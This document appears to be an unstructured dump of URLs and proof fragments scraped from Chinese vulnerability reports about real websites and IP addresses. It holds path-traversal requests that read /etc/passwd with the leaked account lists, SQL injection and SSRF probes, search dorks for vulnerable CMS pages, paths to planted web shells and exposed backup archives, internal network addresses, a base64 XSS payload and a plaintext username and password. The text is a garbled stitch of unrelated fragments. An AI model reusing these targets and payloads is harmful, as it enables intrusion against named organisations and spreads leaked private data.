http://xiaowei.yixin.com/test.txt,同步成功。 http://xiaowei.yixin.com/test.txt/1.php,访问该连接成功解析,nginx解析漏洞存在。 http://xiaowei.yixin.com/xiaowei.txt/1.php成功 english:english.creditease.cn http://widget.renren.com/dialog/share?resourceUrl=http://10.10.116.11 http://103.243.137.4/index.php http://www.baomihua.com/manage/UserInfoModify/LabelInfo.aspx http://www.zjgzfcg.org/purchase/Project/ProjBidCateShow.aspx http://223.4.212.124/front/display.action?articleId=402881ee46576d14014657b2b7060014 http://219.142.42.19/ http://219.142.42.19/login.do?method=show_modPassword http://i.maxthon.cn/。中间人可以在这页上插入脚本,调用maxthon对象。 http://game.feng.com/game/newsAuthor/jsonToInformation-page-2-type-all-sort-time_desc.shtml?contributor=98wwcc http://1.85.33.149:8080/vrd/front/userInfo/gotoIndex.action http://www.joinwish.com/wishdetail_service/loadgivers?id=10076886&page=1&sort=1 http://www.zkungfu.com/app/website/tcustomdiningclasslistonlinecontroller/queryDiningMclassList?diningmclassid=1 http://diantai.ifeng.com:80/index.php/stat/viewStat index.php/stat/clickStat http://opr.84000.com.cn:8480/gcportal/login.jsp http://opr.84000.com.cn:8480/setup/ inurl:/docinfo.action?dbid= http://202.195.136.150/docinfo.action?dbid=72&docid=40824 http://202.199.163.37/docinfo.action?dbid=72&docid=40619 http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793 http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927 http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517 http://202.195.136.150/docinfo.action?dbid=72&docid=40824 http://202.195.136.150/docinfo.action?dbid=72&docid=40824 http://cx.wap.unisk.cn/user/user/login.action http://www.aspcms.com/aspcms-2179839-1-1.html http://hbmtsrm.hisense.com/custom/GetNewsPageData.aspx?pagetype=GroupNewsList&keyword=&GroupId=189&buyGroupId=&companyId=&child=true&p= https://202.103.124.60/por/login_psw.csp http://218.25.119.234:8888/oa/index.asp这事网址 http://61.183.149.138/ http://pic4.semir.com/admin/index.aspx http://www.yichemall.com/order http://case.nau.edu.cn/newsView2.php?id=29 http://target/asp/fljs/list.asp?ParentID= svn://211.103.171.52/www/service svn://211.103.171.52/www/frontend svn://211.103.171.52/www/backend http://bjgcxx.baoji.gov.cn/xmxinxi_list1.php?tid=532&sid=8 http://pan.baidu.com/s/1hqtefMO https://github.com/wuchaofan/staticserver/blob/993c3e8e11891bb5276bb6af86e4b5a36e287345/staticserver.py http://106.186.30.236:8003/ http://106.186.30.236:8000/ http://106.186.30.236:8080/ http://manager.17chang.com/ http://ftp.17chang.com/ inurl:ws2004 http://www.sdwhys.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* http://www.sgtjb.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* http://www.fzjcxx.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* http://www.wuai.lwedu.sh.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* http://www.yzsx.net.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* http://www.sndsx.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* http://www.yygy.net/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* http://webim.91.com:80/.svn/entries http://extra.lenovo.com.cn/login.php http://58.213.19.68/rails_admin/main http://localhost//phpok/admin.php?c=update&f=unzip http://ningbo.19lou.com/vote/html/11676-result.html?73 display:none http://localhost/phpok/admin.php?c=admin&f=save http://wdcwx.wanda.cn/ http://wdcwx.wanda.cn/statics/ http://wdcwx.wanda.cn/reg.html http://wdcwx.wanda.cn/service/user.ashx?t=reg&name=1&mobile=13909090909&code=&tjname=&tjdate=&openid=&_=1421239446740 http://www.ddhong.com/tempUpload.action http://www.jinwei.com.cn/news/news.asp?id=1 http://www.jinwei.com.cn/logins.asp http://mailarchive.263.net/user.action http://121.14.133.17/福建电信,Resin文件读取 http://121.14.133.17/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://125.88.10.244/iCloud/ http://58.53.197.139/index.action http://58.53.197.139/k8cmd.jsp http://221.226.53.76:9080/sti/login.do http://seeyou.seecom.com.cn/sysadmin/login.aspx http://seeyou.seecom.com.cn/uploadfiles/images/2014/12/20141203075614478.asp http://www1.nuc.edu.cn/hqfw/listyq.php?classid=3 http://wa.cig.com.cn/ http://www.imac.edu.cn:80/yb/main.asp?id=248 http://www.imac.edu.cn:80/yyrw/index.asp?id=468 http://218.94.128.133/zl http://bbs.hiwifi.com http://bbs.hiwifi.com/home.php?mod=space&uid=109048&do=profile http://shjz.lfmz.gov.cn/ http://www.zzrc.cn/index/personal/previewResume.do?resumeId=4ae679cd4add76fb014ae267d3390137&flag=1 http://exam.nyist.net/admin/files/*******.xls http://www.webrebuild.org/ http://www.szjrwl.com/ inurl:product.asp?class= http://www.spdl68.com/newshow.asp?id=19&mnid=6364&classname=%D0%C2%CE%C5%B6%AF%CC%AC&uppage=/news.asp http://www.cdpi.cn/ http://www.hzwanda.cn http://www.njpf.gov.cn/njpf.rar www.jsrcgz.gov.cn/jsrcgz.rar http://www.nmgmg.gov.cn/nmgmg.gov.cn.rar http://**.**.**/ http://www.cregc.com.cn/read.asp?id=2062 http://www.365pp.com/Order/Submit/Index?sku=10138201 www.365pp.com http://oa.gaosiedu.com/wui/theme/ecology7/page/login.jsp?templateId=1 http://oa.gaosiedu.com/wui/theme/ecology7/page/login.jsp?templateId=1 http://oa.gaosiedu.com/wui/theme/ecology7/page/login.jsp?templateId=1 https://59.151.102.5/ http://221.179.175.72:4440/ http://221.179.175.72:4440/menu/home http://221.179.175.72:4440/project/test1/command/run https://222.92.15.100/base/login/login.php http://test.bescar.com/base/login/login.php http://222.223.56.116/base/login/login.php https://222.92.15.100/base/login/get http://sqlmap.org http://wooyun.org/bugs/wooyun-2010-023234 http://111.206.74.123:8090/script http://www.lieyou.com/ URL:http://www.chuguo.cn/album/detail.aspx?id=5315 IP:219.148.37.169 http://cvs.hexun.com/zhaopin/default.aspx?area=&posttype=%CA%B5%CF%B0%C0%E0 www.homeway.net.cn http://stockdata.stock.hexun.c… http://oa.tcl.com/weaver/weaver.email.FileDownloadLocation?fileid=39&do http://www.sqlmap.org http://www.chinafoodsltd.com:8080/IR_E/notice.jsp?ClassID=2015 http://www.sqlmap.org www.chinaf http://data.bank.hexun.com/card/xykcs/csdb.aspx?db=pro208 http://www.sqlmap.org http://www.oppodigital.com.cn/club_register.php?act=check_username&user http://www.sqlmap.org www.oppodi http://www.oppodigital.com.cn/club_get_password.php http://topic.xcar.com.cn/201107/jlys/list.php?iscar=1&count=21&per=8&cu http://www.sqlmap.org http://www.oppobd.com/club_register.php?act=check_username&username= http://www.sqlmap.org www.oppobd http://www.oppodigital.com.cn/club_register.php http://note.youdao.com/memory/?url=http://www.wooyun.org(如需登录,请注册登录) http://note.youdao.com http://127.0.0.1 intitle:trs+inurl:inforadar inurl:jsp/portalsearch inurl:inforadar http://search.cmbchina.com/cmb/jsp/xml/init_sysUsers.xml http://inforadar.trs.com.cn/jsp/xml/init_sysUsers.xml http://oa.fjnet.com:6789/inforadar/jsp/xml/init_sysUsers.xml http://219.130.221.60:8080/inforadar/jsp/xml/init_sysUsers.xml http://114.255.93.220/inforadar/jsp/xml/init_sysUsers.xml http://113.108.133.173/inforadar/jsp/xml/init_sysUsers.xml http://124.172.237.105/inforadar/jsp/xml/init_sysUsers.xml http://oa.fjnet.com:6789/inforadar/jsp/xml/init_sysUsers.xml http://219.130.221.60:8080/inforadar/jsp/xml/init_sysUsers.xml http://114.255.93.220/inforadar/jsp/xml/init_sysUsers.xml http://114.255.93.220/inforadar/admin_Log_List.do?type=3 http://113.108.133.173/inforadar/jsp/xml/init_sysUsers.xml http://113.108.133.173/inforadar/admin_Log_List.do?type=3 http://124.172.237.105/inforadar/jsp/xml/init_sysUsers.xml www2.easou.com addr:120.197.93.208 Bcast:120.197.93.223 Mask:255.255.255.224 addr:10.13.32.208 Bcast:10.13.35.255 Mask:255.255.252.0 addr:127.0.0.1 Mask:255.0.0.0 addr:118.145.13.20 Bcast:118.145.13.63 Mask:255.255.255.192 addr:10.21.13.20 Bcast:10.21.15.255 Mask:255.255.252.0 addr:127.0.0.1 Mask:255.0.0.0 addr:118.145.13.22 Mask:255.255.255.255 addr:118.145.13.17 Bcast:118.145.13.63 Mask:255.255.255.192 addr:10.21.13.17 Bcast:10.21.15.255 Mask:255.255.252.0 addr:127.0.0.1 Mask:255.0.0.0 addr:118.145.13.22 Mask:255.255.255.255 addr:120.197.93.207 Bcast:120.197.93.223 Mask:255.255.255.224 addr:10.13.32.207 Bcast:10.13.35.255 Mask:255.255.252.0 addr:127.0.0.1 Mask:255.0.0.0 addr:120.197.93.209 Mask:255.255.255.255 addr:120.197.93.206 Bcast:120.197.93.223 Mask:255.255.255.224 addr:10.13.32.206 Bcast:10.13.35.255 Mask:255.255.252.0 addr:127.0.0.1 Mask:255.0.0.0 addr:120.197.93.209 Mask:255.255.255.255 addr:120.197.93.205 Bcast:120.197.93.223 Mask:255.255.255.224 addr:10.13.32.205 Bcast:10.13.35.255 Mask:255.255.252.0 addr:127.0.0.1 Mask:255.0.0.0 addr:120.197.93.209 Mask:255.255.255.255 addr:120.197.93.213 Mask:255.255.255.255 http://e.ciwong.com/course http://www.pzhfzjz.gov.cn/zwgk_SGcontent.asp?key=2 http://tongji.tarena.com.cn/upload.action http://multimedia.tcl.com/WEB-INF/web.xml http://multimedia.tcl.com/WEB-INF/classes/applicationContext.xml http://multimedia.tcl.com/WEB-INF/classes/hibernate.cfg.xml jdbc:mysql://10.120.99.19/multimedia?useServerPrepStmts=false&useUnicode=true&characterEncoding=UTF-8&logger=com.mysql.jdbc.log.StandardLogger http://www.55.la/ http://www.55.la/run/user/ajax_loginuser.php http://admin.edm.wanmei.com/ http://new.netecweb.com/back/login.aspx http://new.netecweb.com/back/contect/Disp.aspx?id=1 http://m.baidu.com/from=2001a/pu=sz%401320_480/s?word=xss%E4%BB%A3%E7%A0%81++img&sa=tb&ts=8009202&t_kt=0 http://ued.suning.com/survey/admin/ http://ued.suning.com/survey/admin/?c=account&a=login&rd=Ij48c3ZnIG9ubG9hZD1hbGVydCgxKT48Ig== http://www.dfss-club.com/class/class.jsp?id=16 http://www.dfss-club.com/admin/index.jsp http://www.dfss-club.com/admin/MyJspkja452asdfdfdsldfijkl.jsp http://www.dfss-club.com/img/main.jsp ecard.lzcc.edu.cn/selfsearch/Index_main.aspx?NewsClassCode=2 http://www.sqlmap.org https://61.183.228.66/ https://61.183.228.74/ https://61.183.228.86/ https://61.183.228.110/ https://61.183.228.82/ https://61.183.228.98/ https://61.183.228.70/ https://61.183.228.94/ https://61.183.228.102/ https://61.183.228.78/ https://61.183.228.110 http://60.211.216.19:8080/ras/view/queryName.jsp http://www.mailer.com.cn/demo/ http://mail.mailer.cn/ http://**.**.**/upload1/UploadTemp/ user:liqiang pass:liqiang addr:211.71.69.188 Bcast:211.71.69.255 Mask:255.255.255.0 addr:192.168.2.230 Bcast:192.168.2.255 Mask:255.255.255.0 addr:127.0.0.1 Mask:255.0.0.0 addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0 http://www.dmfh.org.cn/newshow.php?id=238 http://ct.ifeng.com/auth/index http://weather.ganhuoche.com/api/getprovince/ http://weather.ganhuoche.com/api/getprovince/?area=* http://qing.blog.sina.com.cn/blog/controllers/share.php?url=10.210.75.3 http://qing.blog.sina.com.cn/blog/controllers/share.php?url=127.0.0.1 http://qing.blog.sina.com.cn/blog/controllers/share.php?url=127.0.0.1/in2xse231.lmht http://m.coolyun.com:9000/main http://www.taga.gov.cn/1.rar http://www.zjszx.gov.cn/sql.rar http://www.ahpfpc.gov.cn/1.rar http://www.gxdzzl.gov.cn/gxdzzl.rar http://www.wfdpc.gov.cn/wwwroot.rar http://game.g.pptv.com/guest/c/sq/api.php?action=logout发现这是个PPTV的游戏登陆的一个页面,也没有https加密和验证码机制 http://homepage.swjtu.edu.cn/Home/List.aspx?type=search&truename=%%27 http://www.shiyuesoft.com/cases/case.html inurl:detail.html http://110.86.15.246/ http://www.ikanggroup.com/cn/pc/index.html http://shop.healthyd.com/m/Medifast.html) http://shop.healthyd.com/ http://shopadmin.healthyd.com http://www.wooyun.org/bugs/wooyun-2015-091845/trace/0e184aac8bde91257f9c2e657e33692f http://test.52xinyou.cn/这个地址是信游科技提供的专门的测试漏洞的子站 com:8080/../../../../../../../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false landscape:x:104:109::/var/lib/landscape:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin snmp:x:103:106::/var/lib/snmp:/bin/false yuwanfu:x:1001:1003::/home/yuwanfu:/bin/bash wuhaiting:x:1012:1014::/home/wuhaiting:/bin/bash user_00:x:1019:1021::/home/user_00:/bin/bash dspeak:x:1020:1022::/home/dspeak:/usr/sbin/nologin xiaoshengwen:x:2592:2592::/home/xiaoshengwen:/bin/bash sunjianpeng:x:2605:2605::/home/sunjianpeng:/bin/bash liumeijun:x:2659:2659::/home/liumeijun:/bin/bash lijie1:x:2744:2744::/home/lijie1:/bin/bash liangguanhui:x:2063:2063::/home/liangguanhui:/bin/bash liuyixing:x:2832:2832::/home/liuyixing:/bin/bash zenglei:x:2723:2723::/home/zenglei:/bin/bash zhoumingliang:x:2735:2735::/home/zhoumingliang:/bin/bash linxiaohu:x:2083:2083::/home/linxiaohu:/bin/bash liushoukai:x:2902:2902::/home/liushoukai:/bin/bash com:8080/../../../../../../../../../../../../../../../../../etc/hosts http://59.50.113.197:1680/suntek_eap_info_file_dir/attach/public/2.jsp http://c.hexun.com/ajax_StockUserDelegate.aspx?StockCode=000002';waitfor http://futures.ecitic.com/openfile.php?id=59&tfile=../../../../../../../../../../etc/passwd&turl=download root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin citic:x:500:500:citic:/home/citic:/bin/bash mysql:x:100:101:MySQL server:/usr/local/mysql:/bin/bash pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin mircte:x:0:501::/home/mircte:/bin/bash clamav:x:501:502:Clam Antivirus:/home/clamav:/bin/false http://www.wfswl.gov.cn/a.zip http://www.hurf.gov.cn/database.rar http://www.tlepb.gov.cn/wwwroot.rar http://www.xygtj.gov.cn/wwwroot.rar http://www.systats.gov.cn/root.zip http://www.yzqxj.com/showtext.asp?id=14220 http://58.56.6.28:8000/ http://admin.meizu.com/web.rar http://i.g-fox.cn/i.g-fox.cn.zip http://115.182.3.194/code.tar.gz http://183.129.160.94/minshen/minshen.rar http://xyk.jlu.edu.cn/managerNManager.action http://117.79.150.240/../../../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:496:RealtimeKit:/proc:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin pulse:x:497:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin www:x:501:501::/home/www:/sbin/nologin zabbix:x:496:492:Zabbix System:/var/lib/zabbix:/sbin/nologin liaowb:x:502:502::/home/liaowb:/bin/bash zhangsy:x:503:503::/home/zhangsy:/bin/bash zhutao:x:504:504::/home/zhutao:/bin/bash mongod:x:495:491:mongod:/var/lib/mongo:/bin/false apache:x:48:48:Apache:/var/www:/sbin/nologin ganglia:x:494:490:Ganglia System:/var/lib/ganglia:/sbin/nologin zabbixsrv:x:493:489:Zabbix server:/var/lib/zabbixsrv:/sbin/nologin nginx:x:492:488:Nginx server:/var/lib/nginx:/sbin/nologin jiayq:x:505:505::/home/jiayq:/bin/bash chenglu:x:506:506::/home/chenglu:/bin/bash yagnjm:x:507:507::/home/yagnjm:/bin/bash yangjm:x:508:508::/home/yangjm:/bin/bash http://117.79.150.240/../../../../../../../../../../../../../etc/hosts http://feed.36kr.com/../../../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin polkituser:x:87:87:PolicyKit:/:/sbin/nologin avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin alan:x:500:500::/home/alan:/bin/bash andy:x:501:501::/home/andy:/bin/bash ian:x:502:502::/home/ian:/bin/bash mediafed:x:503:503::/home/mediafed:/bin/bash mysql:x:498:497:MySQL server:/var/lib/mysql:/bin/bash mediafedsvn:x:504:504::/home/mediafedsvn:/bin/bash postfix:x:89:89::/var/spool/postfix:/sbin/nologin haproxy:x:497:496:HAProxy user:/var/lib/haproxy:/bin/false xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin avahi-autoipd:x:496:495:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin nagios:x:495:494::/var/spool/nagios:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin nrpe:x:494:493:NRPE service:/:/sbin/nologin ec2-user:x:222:505:EC2 User:/home/ec2-user:/bin/bash sshTunnel:x:505:507::/home/sshTunnel:/bin/bash memcached:x:221:492:Memcached daemon:/var/run/memcached:/sbin/nologin saslauth:x:220:76:"Saslauthd saslauth:/sbin/nologin nslcd:x:65:55:LDAP User:/:/sbin/nologin http://wooyun.org/bugs/wooyun-2014-085445 http://bbs.dichan.com/tie-1412-1.html http://bbs.dichan.com/tie-2111364-4.html ww.tl/_- ww.tl/_- http://auth.ext.jumei.com/可爆破 http://oa.bjjgsj.com//C6/Jhsoft.Web.login/GetPassWord.aspx?flag=getEmai http://www.sqlmap.org http://60.173.215.11/wcm/ http://60.173.215.11/wcm/services/trs:templateservicefacade?wsdl http://110.167.201.102/ Example:http://wap.sogou.com/transcoding/sweb/detail.jsp?sid=11111111&r=1&auto=11111&g_ut=2&url=http://www.qq.com/ http://img.store.sogou.com/net/a/08/link?appid=100520033&url=http%3A%2F%2Fimg1.gtimg.com%2Fnews%2Fpics%2Fhv1%2F16%2F44%2F1776%2F115495636.jpg&referer=http%3A%2F%2Fwww.qq.com%2F http://img.store.sogou.com/net/a/08/link?appid=100520033&url=http://10.12.139.10/favicon.ico http://www.zhengzh.12306.cn/Dzsw/Shky/hwky.wai/com/images/banner.jsp http://60.29.175.24/zytg/sys/Login_dologin.action http://pm.sh13mcc.cn:8888/shssy/sys/Login_dologin.action http://117.32.132.37:8080/slsdjt/sys/Login_dologin.action http://pm.crbcint.com/lqcms/sys/Login_dologin.action http://www.racing-china.com/news_list.aspx?Search=s http://mail.sina.com.cn/register/reg_vipmail.php?uid= http://mail.sina.com.cn/register/reg_vipmail.php?uid=%22%3E http://www.huxiu.com/user/reset_passwdo?resetpasswd=f381654aec54e880bd0c41bc15915d89 http://www.czxx.gov.cn http://www.czxx.gov.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig/default.aspx http://www.czxx.gov.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemState/default.aspx http://www.czxx.gov.cn//fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemErrorLog/default.aspx http://www.czxx.gov.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig/ http://study.zjwst.gov.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig/ http://www.dzjy.net.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig/ http://dn.gzgb.gov.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig/ http://www.bzdyjy.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig/ http://dy.gzgb.gov.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig/ http://www.rdgx.gov.cn/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig http://www.asgj.net/fwadmin/Manager/Module/FrameWork/SystemMaintenance/SystemConfig http://c.miaozhen.atm.youku.com/../../../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash redis:x:101:157:Redis Server:/var/lib/redis:/sbin/nologin lighttpd:x:102:158:lighttpd server:/var/www/lighttpd:/sbin/nologin youkuadmin:x:500:500::/home/youkuadmin:/bin/bash http://www.tbqjx.com/news-page.php?id=2 inurl:erji.aspx?id= http://222.135.109.70:8100/erji.aspx?id=268&deptid=0 http://61.133.119.187:8089/erji.aspx?id=268&deptid=0 http://221.2.149.47:8100/erji.aspx?id=268&deptid=0 http://222.135.76.147:8100/erji.aspx?id=268&deptid=0 http://60.217.72.17:8073/erji.aspx?id=268&deptid=0 http://221.2.171.59:8000/erji.aspx?id=268&deptid=0 inurl:economyview.aspx?id= http://222.135.109.70:8100/economylist.aspx?deptid=54&id=279 http://61.133.119.187:8089/economylist.aspx?deptid=52&id=220 http://222.135.127.190:7000/economylist.aspx?deptid=&id=245 http://221.2.171.59:8000/economylist.aspx?deptid=52&id=267 http://60.217.72.17:8000/economylist.aspx?deptid=48&id=220 http://61.133.119.187:8089/economyview.aspx?id=220&newsid=1735&deptid=51 http://222.135.127.190:7000/economyview.aspx?id=268&newsid=1696&deptid=55 http://221.2.171.59:8000/economyview.aspx?id=220&newsid=2086&deptid=52 http://60.217.72.17:8000/economyview.aspx?id=220&newsid=2092&deptid=48 http://222.135.109.70:8100/economyview.aspx?id=245&newsid=2340&deptid=54 http://www.dfsszc.com/Message.aspx?m=20131120105221290656 http://home.ciwong.com/ http://ip.xh.sh.cn/xhkj/user/login!login.do http://auto.smartisan.com/etc/my.cnf http://auto.smartisan.com/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin 